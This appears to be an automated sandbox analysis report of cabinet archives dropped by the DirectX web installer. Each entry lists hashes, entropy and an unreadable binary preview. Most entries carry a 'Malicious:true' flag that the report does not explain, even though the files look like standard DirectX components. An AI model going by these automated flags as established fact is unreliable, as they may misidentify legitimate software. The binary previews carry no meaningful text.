                                                                                              SHA-512:2ACAEA2DE2D77BBE8206E8309D48A4CBA432D72FB9BDE2576BCE7A31EE29FDCB0D44C2B996E8DC21A31BCDB03C806E11AD53B74D9C4C972436D5202825900C01
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! .........4=< .xact2_2_x86.cat..6..! ....C4-E .x3daudio1_0.dll......V.....4.; .xactengine2_2.dll.W..........4.; .jun2006_xact_x86.inf.....`......4.; .xact2_2_x86.inf.r....8..CK.|.\....l...Y.".....Y.(H^.@.`@$,.Jr...#..+.....'b.'f.......x;..S.TL.....]t.w...{.{..s...........8f.ZC..._.P4..y....R(......'.j...<.%.-k.....M).W..8...V.Y....2`O..>q....jO..1....;.\{...'.=...+-.....:`.....c..t..1o..`<..0G.y..e.r|..r>P..9.({C-.r.@..8~..qs...>6G.r.....@...]0/..Vl.....q....l....j..... .#...o..J.p.6..:w.>..W....iTFi)..<..s#.AX.&..dL.I.vG?.BM.t...._.X...a....%..Wd.*5.$.#{..?G..Gj..ds.._..7@.@JG.G~*]:.=v&..'u.......bb...`g......`..s.)?Rj;..K....#..Im(.....Lq.........'5..p...xl.^..!.05H..P._*.....hf..3c{.H..I|........DB...9.?1..y...}.&;..c......tl...w2..`.:......q{s......`"...R..p..W.p.....vc3...6A..;..v..`b.D..<W-o.....;.....jy.2...zm..t.n.R..B..G...Vq.....).:.M...Ha@...Q..N.0.N.......4`E....(....

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Jun2007_d3dx10_34_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 692512 bytes, 6 files, at 0x44 +A "d3dx10_34_x86.cat" +A "d3dcompiler_34.dll", flags 0x4, ID 9065, number 1, extra bytes 20 in head, 49 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):701680
                                                                                              Entropy (8bit):7.9989902264021255
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:SuBBWP1krfKO0BZwB6ux8hBXsRbD3RazqgwLdJPMqHy7qdXCyhUW3zE:DBTrZ0BZwV8fXsprRaxsDBHyWdXg5
                                                                                              MD5:19383CBADA5DF3662303271CC9882314
                                                                                              SHA1:123C97C33F7EF2BA345B220450F181D440412E6B
                                                                                              SHA-256:8EC971C91040618338AC2369188F3E5D7C85A5B1E3B9FC8E752DD845D295CDBA
                                                                                              SHA-512:A4C6ACC9FF656E05D75AE0081C65C200B584209C99FD001494C4D206F2CE8A78D2DD3644E51018574928F3B9E9373BF7EC8C5147A3590B54D1C6D50E61342853
                                                                                              Malicious:true
                                                                                              Preview:MSCF.... .......D...............i#.......... ....#..............1....).........6.. .d3dx10_34_x86.cat.p)...).....6.. .d3dcompiler_34.dll.h...2S.....6.. .d3dx10_34.dll.I..........6.. .d3dx10_34_x86.inf.i..........6.. .d3dx10_34_x86_xp.inf.c...L......6.. .jun2007_d3dx10_34_x86.inf.....{5..CK.|.|......m:..s66...$.\.-K2...B....-.%..\...zI....-.@...!@..<Z(.@..B..@.?..'.k.......f.67;;;;3..gQi....O.7..F....J.m........".z.=.;9.s.D........P...PV.\.U.D......M...3.{K.k>...[z.u#Q...D,..%.%.$j,@wDT..D..]................8\.S.....X*......$....q..pP>.0.8.(q.IQ..;GGq.H.@...z.F...~(...=............W...9....._A.qtt.D:[.......7D...&..N..ee.J....H..LeS,e...CY....K m..9..\....._.e....E..@R..J)p..~e...I......uA..8<>).X.#....P..O.BN...a9#I})RW..J4P./.i.'..v.Po..5.+K...[..+K..2... `]....@............q.($. <B$...8@..b<." ...b.y..,.<..OK.."*..t..q...{^..5..l........J.(Q.o.Yn.]z.:x6.T..J.Z..zG........ .W..-..l.....2.\O..f/.......TJ&W"S$*.2.@.2.a.*....C.......A...{..!.|. ....UVJ7.#.\T..k..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Jun2007_d3dx9_34_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1601814 bytes, 6 files, at 0x44 +A "d3dx9_34_x64.cat" +A "d3dx9_34.dll", flags 0x4, ID 8310, number 1, extra bytes 20 in head, 140 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1611006
                                                                                              Entropy (8bit):7.999795394912666
                                                                                              Encrypted:true
                                                                                              SSDEEP:49152:dyO6V3G0SAcId5iPNJKbtZJSlR3Q0872iOda:dyDlSA/5iPNY7Jo3GPOda
                                                                                              MD5:8DBAA3047397EE4CFCA2EFFFCC2DFBD1
                                                                                              SHA1:D88FAD72D7EAF38B8469B2B8492311C39C42BE04
                                                                                              SHA-256:FE4B15931E048C97CBBC26F753093E7D41ECCF174402542631284F8BDB9EE692
                                                                                              SHA-512:1CE01BF0BD4C0D832D95B13E958DA6CB69C0D3949B128FCF40EC59ECC0AD8989B27C91EAC28CD98777D57DFEB811CC1077FDB87348A11B6370D806771D7E742D
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....q......D...............v ...........q...#...................(.........6.. .d3dx9_34_x64.cat.h.D..(.....6.. .d3dx9_34.dll.h.....D....6.. .infinst.exe.....h.E....6.. .d3dx9_34_x64.inf.......E....6.. .d3dx9_34_x64_xp.inf.,.....E....6.. .jun2007_d3dx9_34_x64.inf.....D...[...S ..uM....5!.f...O.....c.F...7..FA,...Jtc.kn$..P..R..Z.$.J.U#!.TJR)..1.!..@C3.........=.G..{#t.,..7V.uh..8..R...9I-d.X...W.vr..V+}NjE...S...pq.l...)V..,Q6..x.Hb.>9XoA.R.=..v......`.4.3...[f)...`.../........Q..........m...{.y2.u.....m.....}2.r.nF.......c0 ...KI.&sD..YD.2.`0...&....x..~......<$bS.l...C..B...~_...~s....V....)+H..!.....G.p..1...Rn<...=.$.SY.W...=..s..{.7%-.qUs.2..IZI)_(I^.%.....0.w8..~.8.....B..b...Sh...=y3....(I]...L....iF<..{oD.......%...8..S.^.$.E..f..P.....d...l..$...O...G.G&............)I..........I.&...8&....wd.RL..B'..*..phbG..B...ED..0..8....M....N..$..*%-..u.k.KS4...Gd.Z..r...SRJI.V........&?4./)..I.|B.I.I....A...I....1..;.+...9.}.?..c...u.3.].T.~j..$1v./_

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Jun2008_d3dx10_38_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 843959 bytes, 6 files, at 0x44 "d3dx10_38.dll" "D3DCompiler_38.dll", flags 0x4, ID 8962, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):853127
                                                                                              Entropy (8bit):7.998980130768887
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:IKcIh4DqtGLRndZKm4zZTQb4BJ+gfG07QyGeZH:IKc64DgG9dIZTQb4L+GGIGeZH
                                                                                              MD5:B0E2B612DAF28B145B197A4DB0A9B721
                                                                                              SHA1:F69266E4AF3D2DE31A2A2E416F10B0F44737739A
                                                                                              SHA-256:E8DC1063C9434EED8D633741B19CDFA1889581041E2214B87B5159E3EA087F3C
                                                                                              SHA-512:6E31F18CB75CE69D291D0ABD15EDADF02C0693033351DFB2F435312A47540AA223C8176209725C14A05FA6494153A3E191B2FB7CB8C5CEE11FB42371CE67392B
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................#...............#..............=....$.........8wq..d3dx10_38.dll......$.....8wq..D3DCompiler_38.dll.f(..(......8.r..d3dx10_38_x86.cat.I..........8.r..d3dx10_38_x86.inf.i..........8.r..d3dx10_38_x86_xp.inf.c...@......8.r..Jun2008_d3dx10_38_x86.inf...E7%,..CK..\.....\./BS3...$.......p.&..x"........h....J.,5.,._.e....y..-y...#.......YXPP+..y.......y....o*.&..........\....i...YQcs..u.77K.8..h......h..]L...y6.bc..S.\.Y..]..aM.iyo.Xr..2....w...^V.Y.v)..s..w..;..z...........S..WY.b...!....q..W............y.~.x...P..!z.S.....2..{W.x.tJ.....Y....'o5"dE...(...|o.U'.tpJ....8..4.j.vT.+TrVWy.`.P..{![...O.<.!...F...V.........C.k.E.h._..AM..+...E.jG.U.R.F:.].E...Xvw.?....'..,....................A-p...l.[.J....4.. .$.,...`2X.W.c..=Y.>........i.....A-p.?.....`.8..qp.`...A.....P_1.....? ]O....A?P.&........%..c. ..v...,h.=...AK0........k......d..... ....A{....... .|o......&..|......0........d.....[m......X...%C.D.2X.....'&.4..@o......98.~..c

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Jun2010_D3DCompiler_43_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 925511 bytes, 5 files, at 0x44 "D3DCompiler_43.dll" "D3DCompiler_43_x86.cat", flags 0x4, ID 10023, number 1, extra bytes 20 in head, 65 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):934679
                                                                                              Entropy (8bit):7.998315243107519
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:pOWjUzqd7URYQio4yGDUATxoWDYicd3qRbmXHphTheb:ptx6RYQiL1DUA7EicSbUJhIb
                                                                                              MD5:E7DFA140CB0AE502048ECDF1E42360E6
                                                                                              SHA1:4DB08318F78F076FCC6FF29737B3D6D676F59C54
                                                                                              SHA-256:293CED557AD732ABD2737333DF39B08216F31601D7AB65B743FE51B4EFB8B6F0
                                                                                              SHA-512:39B69A5CC4A50DE72D031C41879ED7644B577A9E3E3B44BFECC61D5312C7C32C964DC2CD37DB711F7E486F444CA77FE732C642F3E494E6DA1BC1CF774D9EF75C
                                                                                              Malicious:true
                                                                                              Preview:MSCF....G.......D...............''..........G....#..............A...h# ........<!]..D3DCompiler_43.dll.....h# ....<B'..D3DCompiler_43_x86.cat.!....= ....<.&..D3DCompiler_43_x86.inf.<....A ....<.&..D3DCompiler_43_x86_xp.inf.....QC ....<.&..JUN2010_D3DCompiler_43_x86.inf.W...P!..CK.[{|[.}?.J..'r.$...k.I........;/.`HZBG.e..V.....C....e@..i.%.@C.:.e..2F..t..A...n.i..e..F...s.W..,.l.g...7.{~.....y.k....`...06..1._.l...af..3..S^.<&my.r[. .h.p_.;....P8...J$.R.!...@.:g.Z.......;...s.}.m.....)...U.....4.H..m....u.]s......A.....d.]..."YYK.....&WN..2v..._........*.?vq/3fc.@^.XSD.zD.:.K.a.Mt..........r...LT...C1.+........s..(d.,G.O.l..:y\.X..S.bD.. /..5S.2.v..1/...<r_G.b6^..3....^.@.._5.f.vgD..I..gznTl...[w......p.y[....u...B...v..........&.%..].u.:....}...{..".)..........;......*B1.Jx.b9I8Ax.p.p.PF...........F.".".....|.^%.Hx....;.#.{.......1..B7a.a....$T.J.3.V....=..7./......%<F8B...v.....C.N.$<Hy|.p....Y..W.'.....\i..J(&(.%.....0.S.=y_..........F..[Jp.1......(-.....

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Jun2010_d3dx9_43_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 762076 bytes, 5 files, at 0x44 "d3dx9_43.dll" "d3dx9_43_x86.cat", flags 0x4, ID 7093, number 1, extra bytes 20 in head, 62 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):771244
                                                                                              Entropy (8bit):7.999380380890997
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:E0b5pTUIVIRxV+yb+HJFnXQRGr85UpzQ3VztxmHN8DMFy0BJ1lSIug3SqHAlzJYf:l51NVO+XVLs3VztQHmYjBJb931I1NYI0
                                                                                              MD5:BF124B64FC3774F61D30DE0A405F0C6C
                                                                                              SHA1:2F8A8BABFA4E51555FCF125E8373D9C5F7F7434A
                                                                                              SHA-256:457C5CE48EAA0FE551B46DFFC1E4DCA985D261686D8D4E6BCED533EE1F682FCE
                                                                                              SHA-512:935922CE74BD399E8358693562F86C9B4B6308A6E33586A5DD61924F8B6B2CFD6CB2E472FD082B9EA32C0ABB9A799A0BA9103B4C316342F8072A7A3782C2116C
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D...............................#..............>...X}.........<!]..d3dx9_43.dll.....X}.....<C'..d3dx9_43_x86.cat...........<.&..d3dx9_43_x86.inf.,.........<.&..d3dx9_43_x86_xp.inf.\..........<.&..JUN2010_d3dx9_43_x86.inf.[.'.":..[.... .......5!.P..wOnf..O..........9vm..o..f.6.....+I).H]..t.....T...v.!..M.......>>.{..._..t....g...:..jh.N....K...vJ.r.. ....;J.zq.....*....H....'....d.=...{O.4.xIBC..L7..2....... ..E5`5`........<s...9..(.b3. .."t....M\.;...0......*...H....K.5$...L.Ha....%..e..V........{.t....#3kk.sR6.....I.u.Em....b.Dl'.E.[.D.N....m53%...'.m;.>..yf.6..pN..N.y...-.5Y...f.......-.B#.......;.D]......G.8.5...*G.......x..}...!.GwT.......WwKuT...Y.l[f..}ji...{.h{...x.u.....>..1....k..v.D."W..ZA..<...7=c2QN.Y.......v..k&aHudg.W...`HbV{.Q..CJk..nLpw..#.&5.%S...G.&.`....]...EpFY...(....P\..+/`..&..ap....S....BR..'....s..c........p..B..j*....c..D....mU.x....N.r..QfEz`...}.._...........8..$..........!.G...i.@..P...."c..d.L00...QX.B0.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Nov2007_d3dx10_36_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 797924 bytes, 6 files, at 0x44 +A "d3dx10_36_x86.cat" +A "d3dcompiler_36.dll", flags 0x4, ID 9083, number 1, extra bytes 20 in head, 56 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):807092
                                                                                              Entropy (8bit):7.998858073625772
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:EL+Y8gC2xQcaINcDDHwNXjNOl93uN850V7ZcR0SEDR3l3M:vD2xaINcDHIzhs0Vwz6c
                                                                                              MD5:3D9A0C59156D03DA0F19C2440E695637
                                                                                              SHA1:55B050991CB17410C75ADC3913066BAEDB482ED0
                                                                                              SHA-256:BDF7FB01C02783A4F8C9F5E7911F5CAE3E2A7CBC425B90B36F9EA6EEF2C27DE3
                                                                                              SHA-512:E9A662498C43865E917F0778B772D6964517E41289CBF5A0B8A4E44D8C4B4E9A5049C76F2ECBE4ACC7E9CFCC3F1D87A75C3F8703E66804CE758969814BA14FDA
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....,......D...............{#...........,...#..............8...h(........V7.. .d3dx10_36_x86.cat.....h(....L7.y .d3dcompiler_36.dll.h.... ....B7.O .d3dx10_36.dll.I.........V7P. .d3dx10_36_x86.inf.i...1.....V7P. .d3dx10_36_x86_xp.inf.c.........V7P. .nov2007_d3dx10_36_x86.inf..d.....CK..8.....Y..^(4cK.......H....0..F.]1..$.(W...P.-..J.).[*.%Q....M.v......>Os.c.......=.|.}..d*.r.5....q.s.J..*k8....y89....e...D...Q.!aL./,..l...@~N..J~..)...=..].)......o.@.... ......,R...".@&L.i..........Z.6`..C.......]6.Z.._V..J T.B......l......,..t.6.....md.p..5...l.....B...aI,.F.mU..<T...@Hf.......d{..... ..1.0$.....j.AE..#'..'.%..%....4..p..P.g%..(.H..d..........R#..L..H. mXq..c......6tU$....cii.e............1dA...f.... .........U.B..b.....Fj.z;x...f2. gY.....9.u24. .O&....!E-.....R.d+...5.b..![.dG.....""{U.C...........9p.M....Y|.\f......E....).J...d..0.l.A......0$.....}....e......t..^W..LM(.$,... +.....A..K...f.p..dD...,..E2n..2/k-...d.E2.-.@.S...1.........pA..H..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Nov2008_d3dx10_40_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 959461 bytes, 6 files, at 0x44 "d3dx10_40.dll" "D3DCompiler_40.dll", flags 0x4, ID 8926, number 1, extra bytes 20 in head, 77 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):968629
                                                                                              Entropy (8bit):7.999011847061652
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:JKTxCzc8gSDnU8Hz10a0s65QckarHGlImJtXn+QbtU0sHsqzn:mxCzs29r0WQma69nBbtU0sjzn
                                                                                              MD5:5DFEB46E60795266DA03F2D0A67E7ACD
                                                                                              SHA1:A77758873E5544E8AD22ACF469C4A0FD0C944A88
                                                                                              SHA-256:EC52B075A3E9C7FE468B317E0FF977964B1003D560065128741F4392BF47C49A
                                                                                              SHA-512:6EC058811AC017BE3CD3A46559CD73126666F41B0FA58D92C1168CF2A2E0E2357B19F65531C786EC81A438975DBECE440C5E7B6C653AFA5428CE6C444179AF6C
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D................"..............#..............M...X.........O9.2..d3dx10_40.dll.`...X.....O9.2..D3DCompiler_40.dll.......%...O9p:..d3dx10_40_x86.cat.I...g.&...O9h8..d3dx10_40_x86.inf.i.....&...O9h8..d3dx10_40_x86_xp.inf.c.... &...O9h8..Nov2008_d3dx10_40_x86.inf....X.0..CK..T...{..J........D...$.....$.2.....&L+...u..Q.5#f...W].9cN...w..Qd...y.......9~.}..]u+tOMM...r.].a.O..f7#.\........m.l._a.[..,4Q.&KU...c.eq1))*.,V!S...)2...Y.*^a.Q..b........y_x.W..Q^J^.j..P..gB.*..<w....E_).$j..q.|y..{.'....1V-..N.bt..%...A.0K....u...O...K.u.F.H(u>.X.vbd.......)..Ltg)c.a..J..|.V).N.F`G.Lxk..Rf.-.<1b...0..y...*y!.g..F1Z.v..T..o......i.............!Jku.:..i...e.....Z.HR.0...6.....zk1..._.-.L....a).Gx.).........@6...........P.\....?`.....f...|.r......L9......S.T ........o:J.'.E`?..x..?...$........z.......,.<.'..D.j .....G...3...G;.......p...&@W...;....^........R .X.....L ............-...........'.r`7........)........=......r..j,e..j.)..........uX)..p.B...

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\OCT2006_d3dx9_31_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1406942 bytes, 5 files, at 0x44 +A "d3dx9_31_x64.cat" +A "d3dx9_31.dll", flags 0x4, ID 6653, number 1, extra bytes 20 in head, 124 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1416110
                                                                                              Entropy (8bit):7.999689455720137
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:DapRo0d7USayTXsV6ZMwksqb7CL7eRS3OnQdPIKoQZvkGVOxtWcjxWO3ehFWG492:DU+0wyTXsMiw+OORhQRdZLdc1BehFV4g
                                                                                              MD5:EDBA7BC2A22F3186420C271B7291DCA3
                                                                                              SHA1:65483DB4269BE348528FD205239B811D775421CA
                                                                                              SHA-256:4F5CFFA56FD44F7775F12FC511A1E3F030C05AC78484F6866B12B82979067C22
                                                                                              SHA-512:90A9FDAD3D7F933DA8C3731E42D262034907D8088B85D7100BE46C57DEF02B436C31EB9FF144B9D67FD931F92A1677EC0CD762D9AAF066BB026F139499BA3A66
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....w......D............................w...#..............|.............<5m. .d3dx9_31_x64.cat...<.......<5.. .d3dx9_31.dll.......<...<5.. .infinst.exe.....'.=...<5.. .d3dx9_31_x64.inf.&.....=...<5.. .oct2006_d3dx9_31_x64.inf...l.9..[.... .......$a.V...>.H.!D;..mw.U............u..J..kAE.-....Z..-..kZ..FFf.........w.......Z...UpO..\.>?D.uJ;..nq.....w.........6.......|.G&U....Z.*U!cZF.A!..&R.$......u........[(o.o..{...yr.0c..*R..:.*.&...b....?P.i....._..\....w..4z....)..z...d:..B.'|/....O.j..h..............G1.....|^l...2..'.J0*AT.H"..T...@].....|,.....;..9.RL...r...Z...}.....\j..*.UGZK.\ .t..K.-.... $.r.5...e...#...9@..%.X..`s.........o..O.`..5.&...........w.....P/;~ZA~&..D..Ao.z...GW.......$..+......_.R{...C....#?..5.`.....-.y.o/.a.[....[..x._.s....x9.~.N..|.kyU.............o.. .S...f...i....3...(,..SyKM1kdv...q.b<...e.{..K.....F...Z..d(s.....1.......v..K.H=H..%...=...~..m}.C......|..h.UV../.H+HS|...{.<...Q...3.P.U...Z.....O1>.:X.p..5

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\dxupdate[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 91192 bytes, 3 files, at 0x44 "dxupdate.dll" "dxupdate.inf", flags 0x4, ID 3666, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):100360
                                                                                              Entropy (8bit):7.9900557178400815
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:lvknxJpNYAzRstaRkz0BwwnNbSa+vp5647S:FkZNXsERk6wwBSa+vnl2
                                                                                              MD5:4AFD7F5C0574A0EFD163740ECB142011
                                                                                              SHA1:3EBCA5343804FE94D50026DA91647442DA084302
                                                                                              SHA-256:6E39B3FDB6722EA8AA0DC8F46AE0D8BD6496DD0F5F56BAC618A0A7DD22D6CFB2
                                                                                              SHA-512:6F974ACEC7D6C1B6A423B28810B0840E77A9F9C1F9632C5CBA875BD895E076C7E03112285635CF633C2FA9A4D4E2F4A57437AE8DF88A7882184FF6685EE15F3F
                                                                                              Malicious:true
                                                                                              Preview:MSCF....8d......D...............R...........8d...#............................~>.%..dxupdate.dll.02........h=...dxupdate.inf.1...0.....~>.%..dxupdate.cif.T....'..CK.Z}.$.U....;..@.e!.#....G===.=+".?..+.s..l8....o.{....;.+..(...d,..HVd..,......(..[&H.........Y.Y..~..{.gv.vW.'.....^......^...}...1v....2.*.~.......y...a_.....^Z..V?H.Q..bo(..0.Ra...q(..`o....W.....4~...q.?...F.............].....~c...O7^..W..x.?...l.=.~$......'..o;.._.....'u.aK......=..X.........g........~.].[..+..\b._........p.=.....w...%..@.o-.....O2..w...~sn..D_:....G).../e.Q_/....=Y.x........p.0..^....w...A}..'..... ...P.7....3.av...?...Kl.......>t...O`..b.]....x..Y....._...x..}....@.....1.9.o....[.?.......)...g..'.1.i../.^.|..=........x...L.6`...>..,...K./....6...........A.#.?.8.|....?.|......w%K.>@..(.I...9.../....].....%v7.>.....-@.p....E........6...Kc..p?@.....8.|.p/..xg...7...^.(..7..X~?..........#...w...q..U....f.... ..?<.\...}.K.Z.,]+...../..-......e...aO....a9Y......Wg.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\APR2007_XACT_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 145265 bytes, 6 files, at 0x44 +A "xact2_7_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 9001, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):154433
                                                                                              Entropy (8bit):7.994491966822324
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:BcJ4S2kOBrMASnHr7M58QmpeFT7582Skd1ksaIwbhQDp9kkIFxYJQZW9379+:BQ4S2kOi/MKbSV82xKnDVQ/EqQZa3k
                                                                                              MD5:8922189C0A46D26B2C52C65515D87180
                                                                                              SHA1:27830C01AFB15158186A045B7224EF33793AD211
                                                                                              SHA-256:39F970BF4CC42E9325ADA84A603C6C691BF94921385A52325F402F7432ACE697
                                                                                              SHA-512:53D51CAA2CF448681A709F2B9737EF75DEA4E9A46E2B29E6588B13E941671643A64D3597649AA2AE0B1FE9E5D591ED00BAD9FF3344CA62851E03A68279142CAB
                                                                                              Malicious:true
                                                                                              Preview:MSCF....q7......D...............)#..........q7...#...................).........6.. .xact2_7_x86.cat..;...)....e6Ie .x3daudio1_1.dll.h....d.....6.. .xactengine2_7.dll.o...Bb.....6D. .apr2007_xact_x86.inf......h.....6D. .xact2_7_x86.inf.....:l.....6D. .xact2_7_x86_xp.inf..IL..9..CK..8.....Y.$K%;..93..E.R....cd.....lm.*..5!Zme..!.)e.}.$)....f...z....^]W.\.s.....~~.=....*n.E1.1.P<.t..3.)..B....7....Z...,l.7.*7..b..Q.,l.l....._..Q(.....n....ys..g....D@.Z..........Z1A..R......F.,:.[&"Z....E..rzH...1..)..#..L....p......C...6..z;4....dW"....]...&PR...^.p.0..U...[.a.@...9<.......F..@...h........a..As...g.FJ#.....@...d.BA......0..Xq.7o.-.....S9.....;_....L..x...3`......v..el........./....L9...K..=u^.-s..R...N.>84.~...=%..cG....Mh.....sd3xfG...JsN...6.'.....)./1...S..7....@mZ.....7...W..'..wY.US[Y...`..&'..9.~^.-h..a1.Y(.0?M.].NG.H..@..:......&4v&.Aa..N..~3Z..d.9.....H....x..`.s..L;..f.7jB@.Tc..}.....A%..Ej...&..!_d.i2q..3M........(`.?.c.(4Z..Av...4........?..B

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\APR2007_xinput_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 47342 bytes, 5 files, at 0x44 +A "xinput1_3_x86.cat" +A "xinput1_3.dll", flags 0x4, ID 8235, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):56510
                                                                                              Entropy (8bit):7.973777529821975
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:BcnwcwzHEdb27WH2SfZDNu75ddnVR+ZFaNk0ZKn4:4wb+2eZonQwt
                                                                                              MD5:B362EC93463D8B6381A864D35D38C512
                                                                                              SHA1:7CE47EBCEDA117D8B9748B5B2D3A6AE99FC239DF
                                                                                              SHA-256:B6C1166C57D91AFEEEAA745238D0D6465FF2084F0606FD29FAF1BFA9E008A6C5
                                                                                              SHA-512:CC57733912E2A296A11CD078372C3B43F1256A93EC5BECD0D1B520EB210FCE60938AA1CAA6DBBCA03292A05495B5ECD212EE5F77E3EBABB11EF31F1975B2D09E
                                                                                              Malicious:false
                                                                                              Preview:MSCF...........D...............+ ..............#...................(.........6{. .xinput1_3_x86.cat.h?...(.....6.. .xinput1_3.dll......h.....6G. .apr2007_xinput_x86.inf......m.....6G. .xinput1_3_x86.inf./....p.....6G. .xinput1_3_x86_xp.inf.i...T5..CK.y<.....Y.d..H.<3.1....=...`,cbB.f...*R*kB..V..E...,.[$I.R(~g..n........}....<....y>.9.s.....f*&.s)E.F..Cp ..Q...D 0<0.;....R.....3.\...4...F.1QI...........@..O....2.f....I\...a...c4.0.....,...0.!..6.. M...@..:..ocp.A.K6......... .F..!...[....+..,...0n...<..@cl`+Xe^.X.t.$.;{X@.P....@d..N=.....Z..g....&...#...%]....~.........C. #..u...h(.4^.4.... a.a...*#.Z<....%.{..5..n$....P@[..C<01..Y...F.\..[.H.H.l..f.l.X.0...l.4.A....+B.~.|.l.YO0..k}i>~V..O.f...M0n^.?..B..........a.......N.w/==J.{..D@0..Q.....%..@6..Z.|......@@.4..a.....q......t....4v....dI.Ym..^...........[7.XH.8Y.nR..d.<.;O.."k...d.y2aV..4....D...5..B".H~.....+x_o.4....c.#.`..0...v.F4........I.Q$.....x....._..;]...O[....l....?..:.......Q._....2.;.~...NXz

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Apr2005_d3dx9_25_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1341394 bytes, 5 files, at 0x44 +A "d3dx9_25_x64.cat" +A "d3dx9_25.dll", flags 0x4, ID 6661, number 1, extra bytes 20 in head, 119 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1350562
                                                                                              Entropy (8bit):7.999714569554039
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:qc+wdspnWpjnrcf+FH+guUawET50xShS+KMMMBNNxjUBH/0ghOw5b:r+AspngnK1TDhS+jMMBN3jeHLhOE
                                                                                              MD5:E961A77647E7FC2597A68FF572F730E1
                                                                                              SHA1:976D1CDE1EC28A4992E1CBC345637447115F14C8
                                                                                              SHA-256:A239E99D02FBFC9D30D5B705AA743FC070386FAEA1A66B3D67099AB446568A12
                                                                                              SHA-512:CF72AE18E99942D959BCE58678F544A10C98802D919ADC30737389D6CC0D492F8D7902E0E2CD04501FE6429B96C782649658D2D35C879A202C23E88570A15B94
                                                                                              Malicious:true
